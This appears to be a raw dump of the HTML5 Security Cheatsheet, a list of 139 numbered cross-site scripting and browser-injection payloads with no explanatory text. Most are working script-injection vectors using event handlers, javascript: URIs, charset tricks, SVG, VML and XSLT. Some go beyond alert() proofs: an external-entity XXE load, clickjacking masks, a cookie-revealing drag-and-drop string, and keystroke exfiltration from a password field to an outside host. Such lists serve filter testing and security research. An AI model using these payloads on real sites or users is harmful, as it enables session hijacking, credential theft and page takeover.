331 lines
22 KiB
Plaintext
331 lines
22 KiB
Plaintext
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(24)>`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>
|
||
<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(28)>>//["'`-->]]>]</div>
|
||
<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>
|
||
<div id="39"><!-- up to Opera 11.52, FF 3.6.28 -->
|
||
<![><img src="]><img src=x onerror=alert(39)//">
|
||
|
||
<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->
|
||
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div>
|
||
<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>
|
||
<div id="41"><li style=list-style:url() onerror=alert(41)></li>
|
||
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div>
|
||
<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>
|
||
<div id="43"><?xml version="1.0" standalone="no"?>
|
||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||
<head>
|
||
<style type="text/css">
|
||
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
|
||
</style>
|
||
</head>
|
||
<body>Hello</body>
|
||
</html>//["'`-->]]>]</div>
|
||
<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>
|
||
<div id="53"><xml id="xss" src="test.htc"></xml>
|
||
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>
|
||
<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>
|
||
<div id="61"><div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>//["'`-->]]>]</div>
|
||
|
||
<div id="62"><!-- IE 6-8 -->
|
||
<x '="foo"><x foo='><img src=x onerror=alert(62)//'>
|
||
|
||
<!-- IE 6-9 -->
|
||
<! '="foo"><x foo='><img src=x onerror=alert(2)//'>
|
||
<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div>
|
||
|
||
<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
|
||
<img src="javascript:alert(2)">
|
||
<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓
|
||
<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>
|
||
<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>
|
||
<div id="66"><?xml version="1.0"?>
|
||
<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
|
||
<root/>//["'`-->]]>]</div>
|
||
|
||
<div id="67"><!DOCTYPE x [
|
||
<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"
|
||
onerror CDATA "alert(67)"
|
||
onload CDATA "alert(2)">
|
||
]><img />//["'`-->]]>]</div>
|
||
|
||
<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">
|
||
<html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x>
|
||
</doc>//["'`-->]]>]</div>
|
||
<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>
|
||
<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div>
|
||
<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>
|
||
<div id="87"><svg xmlns="http://www.w3.org/2000/svg">
|
||
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a>
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||
|
||
<animation xlink:href="javascript:alert(88)"/>
|
||
<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
|
||
|
||
<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
|
||
|
||
<foreignObject xlink:href="javascript:alert(88)"/>
|
||
<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/>
|
||
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="89"><svg xmlns="http://www.w3.org/2000/svg">
|
||
<set attributeName="onmouseover" to="alert(89)"/>
|
||
<animate attributeName="onunload" to="alert(89)"/>
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="90"><!-- Up to Opera 10.63 -->
|
||
<div style=content:url(test2.svg)></div>
|
||
|
||
<!-- Up to Opera 11.64 - see link below -->
|
||
|
||
<!-- Up to Opera 12.x -->
|
||
<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div>
|
||
|
||
<div id="91">[A]
|
||
<? foo="><script>alert(91)</script>">
|
||
<! foo="><script>alert(91)</script>">
|
||
</ foo="><script>alert(91)</script>">
|
||
[B]
|
||
<? foo="><x foo='?><script>alert(91)</script>'>">
|
||
[C]
|
||
<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>">
|
||
[D]
|
||
<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>
|
||
<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>
|
||
<div id="94"><svg xmlns="http://www.w3.org/2000/svg">
|
||
<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler>
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||
<feImage>
|
||
<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,
|
||
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
|
||
</feImage>
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
|
||
<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div>
|
||
|
||
<div id="97"><!-- IE 5-9 -->
|
||
<div id=d><x xmlns="><iframe onload=alert(97)"></div>
|
||
<script>d.innerHTML+='';</script>
|
||
|
||
<!-- IE 10 in IE5-9 Standards mode -->
|
||
<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>
|
||
<script>d.innerHTML+='';</script>//["'`-->]]>]</div>
|
||
|
||
<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>
|
||
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>
|
||
|
||
<div id="99">XXX<style>
|
||
|
||
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
|
||
|
||
<!--
|
||
--><!--*{color:red} /* all UA */
|
||
|
||
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
|
||
|
||
</style>//["'`-->]]>]</div>
|
||
<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>
|
||
<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo">
|
||
<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>
|
||
</svg>//["'`-->]]>]</div>
|
||
<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>
|
||
<div id="108"><!-- IE 5-8 standards mode -->
|
||
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>">
|
||
|
||
<!-- IE 5-9 standards mode -->
|
||
<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
|
||
<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div>
|
||
|
||
<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
|
||
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
|
||
<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
|
||
<path d="M0,0" style="marker-start:url(test4.svg#a)"/>
|
||
</svg>//["'`-->]]>]</div>
|
||
<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
|
||
<div id="113"><div id="x">XXX</div>
|
||
<style>
|
||
|
||
#x{font-family:foo[bar;color:green;}
|
||
|
||
#y];color:red;{}
|
||
|
||
</style>//["'`-->]]>]</div>
|
||
<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>
|
||
<div id="115"><!--[if]><script>alert(115)</script -->
|
||
<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div>
|
||
|
||
<div id="116"><div id="x">x</div>
|
||
<xml:namespace prefix="t">
|
||
<import namespace="t" implementation="#default#time2">
|
||
<t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(116)>">//["'`-->]]>]</div>
|
||
|
||
<div id="117"><a href="http://attacker.org">
|
||
<iframe src="http://example.org/"></iframe>
|
||
</a>//["'`-->]]>]</div>
|
||
|
||
<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');">
|
||
<h1>Drop me</h1>
|
||
</div>
|
||
|
||
<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>
|
||
|
||
<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
|
||
|
||
<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div>
|
||
|
||
<div id="120"><script>
|
||
function makePopups(){
|
||
for (i=1;i<6;i++) {
|
||
window.open('popup.html','spam'+i,'width=50,height=50');
|
||
}
|
||
}
|
||
</script>
|
||
|
||
<body>
|
||
<a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>
|
||
|
||
<div id="121"><html xmlns="http://www.w3.org/1999/xhtml"
|
||
xmlns:svg="http://www.w3.org/2000/svg">
|
||
<body style="background:gray">
|
||
<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>
|
||
<svg:svg>
|
||
<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">
|
||
<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>
|
||
<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>
|
||
</svg:mask>
|
||
</svg:svg>
|
||
</body>
|
||
</html>//["'`-->]]>]</div>
|
||
<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>
|
||
<div id="123"><span class=foo>Some text</span>
|
||
<a class=bar href="http://www.example.org">www.example.org</a>
|
||
|
||
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
|
||
<script>
|
||
$("span.foo").click(function() {
|
||
alert('foo');
|
||
$("a.bar").click();
|
||
});
|
||
$("a.bar").click(function() {
|
||
alert('bar');
|
||
location="http://html5sec.org";
|
||
});
|
||
</script>//["'`-->]]>]</div>
|
||
|
||
<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
|
||
<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>
|
||
|
||
<div id="125"><?xml version="1.0"?>
|
||
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
|
||
<!DOCTYPE doc [
|
||
<!ATTLIST xsl:stylesheet
|
||
id ID #REQUIRED>]>
|
||
<svg xmlns="http://www.w3.org/2000/svg">
|
||
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
<circle fill="red" r="40"></circle>
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
|
||
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>
|
||
|
||
<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">
|
||
<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
|
||
<handler id="y">alert(127)</handler>
|
||
</svg>//["'`-->]]>]</div>
|
||
<div id="128"><svg><style><img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>
|
||
<div id="129"><svg>
|
||
<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>
|
||
<!--
|
||
Same effect with
|
||
<image filter='...'>
|
||
-->
|
||
</svg>//["'`-->]]>]</div>
|
||
|
||
<div id="130"><math href="javascript:alert(130)">CLICKME</math>
|
||
|
||
<math>
|
||
<!-- up to FF 13 -->
|
||
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
|
||
|
||
<!-- FF 14+ -->
|
||
<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
|
||
</math>//["'`-->]]>]</div>
|
||
|
||
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
|
||
<br/><hr/>
|
||
jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
|
||
<br/><hr/>
|
||
feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
|
||
<br/><hr/>
|
||
feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>
|
||
<br/><hr/>
|
||
feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
|
||
<br/><hr/>
|
||
<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>
|
||
|
||
<div id="132"><!doctype html>
|
||
<form>
|
||
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
|
||
<br>
|
||
<input name="secret" type="password">
|
||
</form>
|
||
<!-- injection --><svg height="50px">
|
||
<image xmlns:xlink="http://www.w3.org/1999/xlink">
|
||
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
|
||
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
|
||
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
|
||
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
|
||
</image>
|
||
</svg>//["'`-->]]>]</div>
|
||
<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>
|
||
<div id="134"><xmp>
|
||
<%
|
||
</xmp>
|
||
<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>
|
||
|
||
<script>
|
||
x='<%'
|
||
</script> %>/
|
||
alert(2)
|
||
</script>
|
||
|
||
XXX
|
||
<style>
|
||
*['<!--']{}
|
||
</style>
|
||
-->{}
|
||
*{color:red}</style>//["'`-->]]>]</div>
|
||
|
||
<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?>
|
||
<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
|
||
<template match="/">
|
||
<eval>new ActiveXObject('htmlfile').parentWindow.alert(135)</eval>
|
||
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
|
||
</template>
|
||
</stylesheet>//["'`-->]]>]</div>
|
||
|
||
<div id="136"><form action="" method="post">
|
||
<input name="username" value="admin" />
|
||
<input name="password" type="password" value="secret" />
|
||
<input name="injected" value="injected" dirname="password" />
|
||
<input type="submit">
|
||
</form>//["'`-->]]>]</div>
|
||
|
||
<div id="137"><svg>
|
||
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
|
||
<circle r="400"></circle>
|
||
<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" />
|
||
</a>//["'`-->]]>]</div>
|
||
<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="<img src=x:x onerror=alert(1)>" />//["'`-->]]>]</div>undefined
|